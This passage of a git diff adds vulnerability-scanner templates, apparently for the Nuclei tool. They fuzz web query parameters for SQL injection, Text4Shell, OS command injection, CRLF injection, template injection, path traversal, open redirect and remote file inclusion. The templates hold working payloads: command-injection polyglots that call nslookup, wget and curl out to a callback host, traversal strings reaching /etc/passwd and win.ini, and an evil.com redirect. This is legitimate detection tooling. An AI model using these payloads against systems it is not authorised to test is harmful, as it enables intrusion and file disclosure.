SQL injection + author: princechaddha + severity: critical + description: | + An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The Trunc() and Extract() database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected. + reference: + - https://github.com/vulhub/vulhub/tree/master/django/CVE-2022-34265 + - https://nvd.nist.gov/vuln/detail/CVE-2022-34265 + - https://www.djangoproject.com/weblog/2022/jul/04/security-releases/ + - https://docs.djangoproject.com/en/4.0/releases/security/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-34265 + cwe-id: CWE-89 + tags: sqli,dast,vulhub,cve,cve2022,django + +variables: + rand_string: '{{rand_text_alpha(15, "abc")}}' + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + fuzzing: + - part: query + fuzz: + - "test'{{rand_string}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'syntax error at or near "{{rand_string}}"' + - 'LINE 1: SELECT DATE_TRUNC' + condition: and + + - type: status + status: + - 500 +# digest: 4a0a00473045022100991d4f9cc916935beb1ad69688feda3753f72a2ab38d08917c1e133380434c010220783ace6ba00da5d1932b3362ce58cec8541b97e0058c709b6c99ff14f9cdaba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml new file mode 100644 index 0000000000..0e37bfb162 --- /dev/null +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -0,0 +1,68 @@ +id: CVE-2022-42889 + +info: + name: Text4Shell - Remote Code Execution + author: mordavid,princechaddha + severity: critical + description: | + Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. + reference: + - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om + - http://www.openwall.com/lists/oss-security/2022/10/13/4 + - http://www.openwall.com/lists/oss-security/2022/10/18/1 + - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/ + - https://github.com/silentsignal/burp-text4shell + remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-42889 + cwe-id: CWE-94 + metadata: + confidence: tenative + tags: cve,cve2022,rce,oast,text4shell,dast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + text4shell: + - "${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}" + + fuzzing: + - part: query + fuzz: + - "{{text4shell}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + + extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output +# digest: 4a0a00473045022100adec8de25b518a2bc2dec461a62f19c384ddac2951bd98b9ec21df05061c84d9022013f544b276c203c4846921eddf8c0be1a997fd68f5d3c8b8ff71f02873788aed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml new file mode 100644 index 0000000000..f285a8755e --- /dev/null +++ b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml @@ -0,0 +1,48 @@ +id: cmdi-blind-oast-polyglot + +info: + name: Blind OS Command Injection + author: pdteam,geeknik + severity: high + description: | + Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. + Successful exploitation could lead to arbitrary command execution on the system. + reference: + - https://portswigger.net/research/hunting-asynchronous-vulnerabilities + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md + tags: cmdi,oast,dast,blind,polyglot + +variables: + marker: "{{interactsh-url}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + payload: + - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'" + - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}" + - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/" + - "$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{payload}}" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: interactsh_protocol + words: + - "http" +# digest: 490a00463044022058dacdd25a0687edf873bcfed32eb383e77deb0e9ea9673e111501121429df2702202005d54354bf6a06cd873145dea3139f0b094a3baad9e7313fd9d65ef7b31876:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml new file mode 100644 index 0000000000..ab8e383ba3 --- /dev/null +++ b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml @@ -0,0 +1,38 @@ +id: cmdi-ruby-open-rce + +info: + name: Ruby Kernel#open/URI.open RCE + author: pdteam + severity: high + description: | + Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. + reference: + - https://bishopfox.com/blog/ruby-vulnerabilities-exploits + - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ + tags: cmdi,oast,dast,blind,ruby,rce + +variables: + marker: "{{interactsh-url}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + stop-at-first-match: true + payloads: + interaction: + - "|nslookup {{marker}}|curl {{marker}}" + + fuzzing: + - part: query + fuzz: + - "{{interaction}}" + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" +# digest: 490a0046304402206aa8aaaae832c775eb192a6fa98138271fa21bc2ac34b3881f0e06d24fb48f78022040513ba5b73cbfb5fe42c3a312ae9d8e76fb0d6f942ad7bcfe8dfff4f173d00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/crlf/cookie-injection.yaml b/dast/vulnerabilities/crlf/cookie-injection.yaml new file mode 100644 index 0000000000..026d77fdeb --- /dev/null +++ b/dast/vulnerabilities/crlf/cookie-injection.yaml @@ -0,0 +1,36 @@ +id: cookie-injection + +info: + name: Parameter based cookie injection + author: pdteam + severity: info + reference: + - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/ + - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm + tags: reflected,dast,cookie,injection + +variables: + first: "cookie_injection" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + reflection: + - "{{first}}" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{reflection}}" + + matchers: + - type: regex + part: header + regex: + - '(?m)(?i)(^set-cookie.*cookie_injection.*)' +# digest: 4a0a00473045022100af6e35a8b4c4d4533e339e81393faed157da2e68144557ca3fe73fb16178919c022073127c1b729ab0c8c273cbc022b2aca2b7a91a6c4c314633a20059e6b10e22ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/crlf/crlf-injection.yaml b/dast/vulnerabilities/crlf/crlf-injection.yaml new file mode 100644 index 0000000000..194517a9a4 --- /dev/null +++ b/dast/vulnerabilities/crlf/crlf-injection.yaml @@ -0,0 +1,71 @@ +id: crlf-injection + +info: + name: CRLF Injection + author: pdteam + severity: low + tags: crlf,dast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + escape: + - "%00" + - "%0a" + - "%0a%20" + - "%0d" + - "%0d%09" + - "%0d%0a" + - "%0d%0a%09" + - "%0d%0a%20" + - "%0d%20" + - "%20" + - "%20%0a" + - "%20%0d" + - "%20%0d%0a" + - "%23%0a" + - "%23%0a%20" + - "%23%0d" + - "%23%0d%0a" + - "%23%oa" + - "%25%30" + - "%25%30%61" + - "%2e%2e%2f%0d%0a" + - "%2f%2e%2e%0d%0a" + - "%2f..%0d%0a" + - "%3f" + - "%3f%0a" + - "%3f%0d" + - "%3f%0d%0a" + - "%e5%98%8a%e5%98%8d" + - "%e5%98%8a%e5%98%8d%0a" + - "%e5%98%8a%e5%98%8d%0d" + - "%e5%98%8a%e5%98%8d%0d%0a" + - "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d" + - "%u0000" + - "%u000a" + - "%u000d" + - "\r" + - "\r%20" + - "\r\n" + - "\r\n%20" + - "\r\n\t" + - "\r\t" + + fuzzing: + - part: query + type: postfix + fuzz: + - "{{escape}}Set-Cookie:crlfinjection=crlfinjection" + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' +# digest: 4b0a00483046022100cb88bef820fa9247bc7ddc126d8bb67c4d2371c0b4a33f64b4caa5360007f1750221009ea9e7de7dc5fe7e75cf9d215a9c2d9e3323f2caa40b7c4b39cf214f661cce48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml b/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml new file mode 100644 index 0000000000..98993c6b07 --- /dev/null +++ b/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml @@ -0,0 +1,47 @@ +id: angular-client-side-template-injection + +info: + name: Angular Client-side-template-injection + author: theamanrawat + severity: high + description: | + Detects Angular client-side template injection vulnerability. + impact: | + May lead to remote code execution or sensitive data exposure. + remediation: | + Sanitize user inputs and avoid using user-controlled data in template rendering. + reference: + - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ + - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs + tags: angular,csti,dast,headless,xss + +variables: + first: "{{rand_int(1000, 9999)}}" + second: "{{rand_int(1000, 9999)}}" + result: "{{to_number(first)*to_number(second)}}" + +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + + payloads: + payload: + - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{payload}}" + + matchers: + - type: word + part: body + words: + - "{{result}}" +# digest: 4a0a00473045022100adfe788d650a997bddf7f4876f1308a9d1ea62d43e7b90abca139f455492d4e902203223d59aac1aa4374770127adface5ccebfd4a4dc8fdfef8b240578bf7b6df72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/lfi/lfi-keyed.yaml b/dast/vulnerabilities/lfi/lfi-keyed.yaml new file mode 100644 index 0000000000..93df95d6a7 --- /dev/null +++ b/dast/vulnerabilities/lfi/lfi-keyed.yaml @@ -0,0 +1,120 @@ +id: lfi-keyed + +info: + name: LFI Detection - Keyed + author: pwnhxl + severity: unknown + reference: + - https://owasp.org/www-community/attacks/Unicode_Encoding + tags: dast,pathtraversal,lfi + +variables: + fuzz: "../../../../../../../../../../../../../../../" + fuzz_urlx2_encode: "%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f" + fuzz_hex_unicode: "%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f%u002e%u002e%u002f" + fuzz_utf8_unicode: "%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF%C0%AE%C0%AE%C0%AF" + fuzz_utf8_unicode_x: "%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF%C0AE%C0AE%C0AF" + fuzz_bypass_replace: ".../.../.../.../.../.../.../.../.../.../.../.../.../.../.../" + fuzz_bypass_replace_windows: '..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\' + fuzz_bypass_waf_regx: "./.././.././.././.././.././.././.././.././.././.././.././.././.././.././../" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + pathtraversal: + - '{{fuzz}}etc/passwd' + - '{{fuzz}}windows/win.ini' + - '/etc/passwd%00.jpg' + - 'c:/windows/win.ini%00.jpg' + - '{{fuzz}}etc/passwd%00.jpg' + - '{{fuzz}}windows/win.ini%00.jpg' + - '{{fuzz_urlx2_encode}}etc%252fpasswd' + - '{{fuzz_urlx2_encode}}windows%252fwin.ini' + - '{{fuzz_hex_unicode}}etc%u002fpasswd' + - '{{fuzz_hex_unicode}}windows%u002fwin.ini' + - '{{fuzz_utf8_unicode}}etc%C0%AFpasswd' + - '{{fuzz_utf8_unicode}}windows%C0%AFwin.ini' + - '{{fuzz_utf8_unicode_x}}etc%C0AFpasswd' + - '{{fuzz_utf8_unicode_x}}windows%C0AFwin.ini' + - '{{fuzz_bypass_replace}}etc/passwd' + - '{{fuzz_bypass_replace}}windows/win.ini' + - '{{fuzz_bypass_replace_windows}}windows\win.ini' + - '{{fuzz_bypass_waf_regx}}etc/passwd' + - '{{fuzz_bypass_waf_regx}}windows/win.ini' + - './web.config' + - '../web.config' + - '../../web.config' + - './WEB-INF/web.xml' + - '../WEB-INF/web.xml' + - '../../WEB-INF/web.xml' + + fuzzing: + - part: query + mode: single + keys: + - cat + - dir + - action + - board + - date + - detail + - file + - download + - path + - folder + - prefix + - include + - page + - inc + - locate + - show + - doc + - site + - type + - view + - content + - document + - layout + - mod + - conf + - url + - img + - image + - images + fuzz: + - "{{pathtraversal}}" + + - part: query + mode: single + values: + - "^(./|../|/)|(.html|.htm|.xml|.conf|.cfg|.log|.txt|.pdf|.doc|.docx|.xls|.csv|.png|.jpg|.gif)$" + fuzz: + - "{{pathtraversal}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: regex + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + part: body + words: + - 'for 16-bit app support' + + - type: regex + part: body + regex: + - '()' + + - type: regex + part: body + regex: + - '()' +# digest: 4b0a004830460221008cfcfdf2c3bffd887bfe964b433efe76af72df0f94ecea20ec1917cd00641c0f022100874e6ff747dbd4fa96124d034a126534558b56a7c317b32525e3d08199409065:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml new file mode 100644 index 0000000000..4e18560c84 --- /dev/null +++ b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml @@ -0,0 +1,80 @@ +id: linux-lfi-fuzz + +info: + name: Local File Inclusion - Linux + author: DhiyaneshDK + severity: high + reference: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt + - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion + tags: lfi,dast,linux + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + nix_fuzz: + - '/etc/passwd' + - '../../etc/passwd' + - '../../../etc/passwd' + - '/../../../../etc/passwd' + - '../../../../../../../../../etc/passwd' + - '../../../../../../../../etc/passwd' + - '../../../../../../../etc/passwd' + - '../../../../../../etc/passwd' + - '../../../../../etc/passwd' + - '../../../../etc/passwd' + - '../../../etc/passwd' + - '../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd%00' + - '../../../../../../../../../../../../etc/passwd' + - '/../../../../../../../../../../etc/passwd^^' + - '/../../../../../../../../../../etc/passwd' + - '/./././././././././././etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd' + - '/..\../..\../..\../..\../..\../..\../etc/passwd' + - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd' + - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00' + - '%252e%252e%252fetc%252fpasswd' + - '%252e%252e%252fetc%252fpasswd%00' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' + - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00' + - '....//....//etc/passwd' + - '..///////..////..//////etc/passwd' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd' + - '%0a/bin/cat%20/etc/passwd' + - '%00/etc/passwd%00' + - '%00../../../../../../etc/passwd' + - '/../../../../../../../../../../../etc/passwd%00.jpg' + - '/../../../../../../../../../../../etc/passwd%00.html' + - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd' + - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '\\'/bin/cat%20/etc/passwd\\'' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{nix_fuzz}}' + + stop-at-first-match: true + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' +# digest: 4b0a00483046022100a1e70a22bc4f17a046a9b366a9015608da82f88439ab75d052b64088a7009da8022100e29c115d86b47951f1da2fb56d7953ec1e59e93d86b70d24d34ad8c14ad3064d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml new file mode 100644 index 0000000000..5a18f37034 --- /dev/null +++ b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml @@ -0,0 +1,73 @@ +id: windows-lfi-fuzz + +info: + name: Local File Inclusion - Windows + author: pussycat0x + severity: high + tags: lfi,windows,dast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + win_fuzz: + - '\WINDOWS\win.ini' + - '\WINDOWS\win.ini' + - '\WINDOWS\win.ini%00' + - '\WINNT\win.ini' + - '\WINNT\win.ini%00' + - 'windows/win.ini%00' + - '../../windows/win.ini' + - '....//....//windows/win.ini' + - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini' + - '../../../../../windows/win.ini' + - '/..///////..////..//////windows/win.ini' + - '/../../../../../../../../../windows/win.ini' + - './../../../../../../../../../../windows/win.ini' + - '/...\...\...\...\...\...\...\...\...\windows\win.ini' + - '/.../.../.../.../.../.../.../.../.../windows/win.ini' + - '/..../..../..../..../..../..../..../..../..../windows/win.ini' + - '/....\....\....\....\....\....\....\....\....\windows\win.ini' + - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini' + - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini' + - '..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00' + - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini' + - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' + - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini' + - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini' + - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini' + - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini' + - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini' + - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini' + - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini' + - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini' + - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' + - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini' + - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' + + fuzzing: + - part: query + type: replace # replaces existing parameter value with fuzz payload + mode: multiple # replaces all parameters value with fuzz payload + fuzz: + - '{{win_fuzz}}' + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and +# digest: 490a00463044022061480301387935155bae9c0e84b58e21d4d9f1051b2e5fd9954c1397fdd9b67202204b03f96125fa3991ac2a30b43dac7a140a9ec509131b4203cd15efe2179f3b4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml new file mode 100644 index 0000000000..d06fd5dde9 --- /dev/null +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -0,0 +1,182 @@ +id: open-redirect + +info: + name: Open Redirect Detection + author: princechaddha + severity: medium + tags: redirect,dast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + redirect: + - "evil.com" + + fuzzing: + - part: query + mode: single + keys: + - AuthState + - URL + - _url + - callback + - checkout + - checkout_url + - content + - continue + - continueTo + - counturl + - data + - dest + - dest_url + - destination + - dir + - document + - domain + - done + - download + - feed + - file + - file_name + - file_url + - folder + - folder_url + - forward + - from_url + - go + - goto + - host + - html + - http + - https + - image + - image_src + - image_url + - imageurl + - img + - img_url + - include + - langTo + - load_file + - load_url + - login_to + - login_url + - logout + - media + - navigation + - next + - next_page + - open + - out + - page + - page_url + - pageurl + - path + - picture + - port + - proxy + - r + - r2 + - redir + - redirect + - redirectUri + - redirectUrl + - redirect_to + - redirect_uri + - redirect_url + - reference + - referrer + - req + - request + - ret + - retUrl + - return + - returnTo + - return_path + - return_to + - return_url + - rt + - rurl + - show + - site + - source + - src + - target + - to + - u + - uri + - url + - val + - validate + - view + - window + - back + - cgi + - follow + - home + - jump + - link + - location + - menu + - move + - nav + - orig_url + - out_url + - query + - auth + - callback_url + - confirm_url + - destination_url + - domain_url + - entry + - exit + - forward_url + - go_to + - goto_url + - home_url + - image_link + - load + - logout_url + - nav_to + - origin + - page_link + - redirect_link + - ref + - referrer_url + - return_link + - return_to_url + - source_url + - target_url + - to_url + - validate_url + - DirectTo + - relay + + fuzz: + - "https://{{redirect}}" + + - part: query + mode: single + values: + - "https?://" # Replace HTTP URLs with alternatives + fuzz: + - "https://{{redirect}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + + - type: status + status: + - 301 + - 302 + - 307 +# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/rfi/generic-rfi.yaml b/dast/vulnerabilities/rfi/generic-rfi.yaml new file mode 100644 index 0000000000..46cb090042 --- /dev/null +++ b/dast/vulnerabilities/rfi/generic-rfi.yaml @@ -0,0 +1,33 @@ +id: generic-rfi + +info: + name: Generic Remote File Inclusion + author: m4lwhere + severity: high + reference: + - https://www.invicti.com/learn/remote-file-inclusion-rfi/ + tags: rfi,dast,oast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + rfi: + - "https://rfi.nessus.org/rfi.txt" + + fuzzing: + - part: query + mode: single + fuzz: + - "{{rfi}}" + + stop-at-first-match: true + matchers: + - type: word + part: body # Confirms the PHP was executed + words: + - "NessusCodeExecTest" +# digest: 490a0046304402201f706bb5944d3a4a5ee6f4a6920de5a04d097d9a8abaa3a4b3fc992dc96b97c6022059107f23f16f0e83e38f27702bf6184e2a17c11940d204a50a060879c932a76e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/vulnerabilities/sqli/sqli-error-based.yaml b/dast/vulnerabilities/sqli/sqli-error-based.yaml new file mode 100644 index 0000000000..c0b234e0a4 --- /dev/null +++ b/dast/vulnerabilities/sqli/sqli-error-based.yaml @@ -0,0 +1,494 @@ +id: sqli-error-based + +info: + name: Error based SQL Injection + author: geeknik,pdteam + severity: critical + description: | + Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, + or to override valuable ones, or even to execute dangerous system level commands on the database host. + This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . + tags: sqli,error,dast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + injection: + - "'" + - "\"" + - ";" + + fuzzing: + - part: query + type: postfix + fuzz: + 